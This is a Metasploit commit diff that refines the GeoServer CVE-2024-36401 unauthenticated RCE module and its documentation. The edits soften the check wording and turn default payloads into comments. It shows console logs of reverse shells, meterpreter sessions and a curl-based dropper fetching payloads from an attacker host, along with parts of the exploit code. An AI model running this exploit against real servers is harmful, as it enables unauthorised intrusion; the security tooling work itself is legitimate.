Apply suggestions from code review

h00die-gr3y · jheysel-r7 · web-flow · commit 292c177b743b · 2024-07-12T19:20:46.000+02:00
Co-authored-by: jheysel-r7 &lt;Jack_Heysel@rapid7.com&gt;
diff --git a/documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md b/documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
@@ -155,7 +155,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.23.5
+[+] The target appears to be vulnerable. Version 2.23.5
 [*] Executing Unix Command for cmd/unix/reverse_bash
 [*] Command shell session 7 opened (192.168.201.8:4444 -> 192.168.201.86:54072) at 2024-07-11 16:09:30 +0000
 
@@ -180,7 +180,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.23.5
+[+] The target appears to be vulnerable. Version 2.23.5
 [*] Executing Unix Command for cmd/unix/reverse_bash
 [*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-11 16:15:31 +0000
 
@@ -205,7 +205,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.23.2
+[+] The target appears to be vulnerable. Version 2.23.2
 [*] Executing Unix Command for cmd/unix/reverse_bash
 [*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.42:60290) at 2024-07-11 18:42:08 +0000
 
@@ -229,7 +229,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.23.2
+[+] The target appears to be vulnerable. Version 2.23.2
 [*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
 [*] Using URL: http://192.168.201.8:1981/FEflDEJ
 [*] Client 192.168.201.42 (curl/7.74.0) requested /FEflDEJ
@@ -261,7 +261,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.25.0
+[+] The target appears to be vulnerable. Version 2.25.0
 [*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
 [*] Using URL: http://192.168.201.8:1981/CEkJIBo
 [*] Client 192.168.201.42 (curl/7.81.0) requested /CEkJIBo
@@ -295,7 +295,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.23.5
+[+] The target appears to be vulnerable. Version 2.23.5
 [*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
 [*] Using URL: http://192.168.201.8:1981/680jWmUv1qm
 [*] Client 192.168.201.10 (curl/8.5.0) requested /680jWmUv1qm
@@ -331,7 +331,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > run
 [*] Started reverse TCP handler on 172.16.199.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.25.0
+[+] The target appears to be vulnerable. Version 2.25.0
 [*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
 [*] Sending stage (201798 bytes) to 172.16.199.131
 [*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.131:51235) at 2024-07-11 16:14:11 -0700
diff --git a/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb b/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
@@ -50,9 +50,7 @@ def initialize(info = {})
               'Platform' => ['unix', 'linux'],
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash'
-              }
+              # Tested with cmd/unix/reverse_bash
             }
           ],
           [
@@ -63,9 +61,7 @@ def initialize(info = {})
               'Type' => :linux_dropper,
               'Linemax' => 16384,
               'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
-              }
+              # Tested with linux/x64/meterpreter_reverse_tcp
             }
           ],
           [
@@ -74,9 +70,7 @@ def initialize(info = {})
               'Platform' => ['Windows'],
               'Arch' => ARCH_CMD,
               'Type' => :win_cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
-              }
+              # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
             }
           ],
         ],
@@ -178,15 +172,15 @@ def execute_command(cmd, _opts = {})
       'method' => 'POST',
       'ctype' => 'application/xml',
       'keep_cookies' => true,
-      'data' => create_payload(cmd).to_s
+      'data' => create_payload(cmd)
     })
     fail_with(Failure::PayloadFailed, 'Payload execution failed.') unless res && res.code == 400 && res.body.include?('ClassCastException')
   end
 
   def check
     version_number = check_version
     return CheckCode::Unknown('Could not retrieve the version information.') if version_number.nil?
-    return CheckCode::Vulnerable("Version #{version_number}") if version_number.between?(Rex::Version.new('2.25.0'), Rex::Version.new('2.25.1')) || version_number.between?(Rex::Version.new('2.24.0'), Rex::Version.new('2.24.3')) || version_number < Rex::Version.new('2.23.6')
+    return CheckCode::Appears("Version #{version_number}") if version_number.between?(Rex::Version.new('2.25.0'), Rex::Version.new('2.25.1')) || version_number.between?(Rex::Version.new('2.24.0'), Rex::Version.new('2.24.3')) || version_number < Rex::Version.new('2.23.6')
 
     CheckCode::Safe("Version #{version_number}")
   end
